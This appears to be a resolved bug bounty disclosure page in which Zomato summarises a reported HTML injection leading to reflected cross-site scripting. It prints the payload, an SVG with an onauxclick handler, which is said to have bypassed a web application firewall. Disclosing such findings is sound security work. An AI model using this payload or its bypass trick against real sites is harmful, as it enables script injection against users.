HTML injection leads to reflected XSS
Low
Z
Zomato
Submitted None
Team Summary
Official summary from Zomato
The following payload was used to bypass the WAF: ```html "><svg height="1000" width="1000" onauxclick=confirm`12233`> <circle cx="500" cy="500" r="400" stroke="black" stroke-width="3" fill="red" /> </svg> ```
Actions:
Reported by
haxor5392
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$150.00
Submitted
Weakness
Code Injection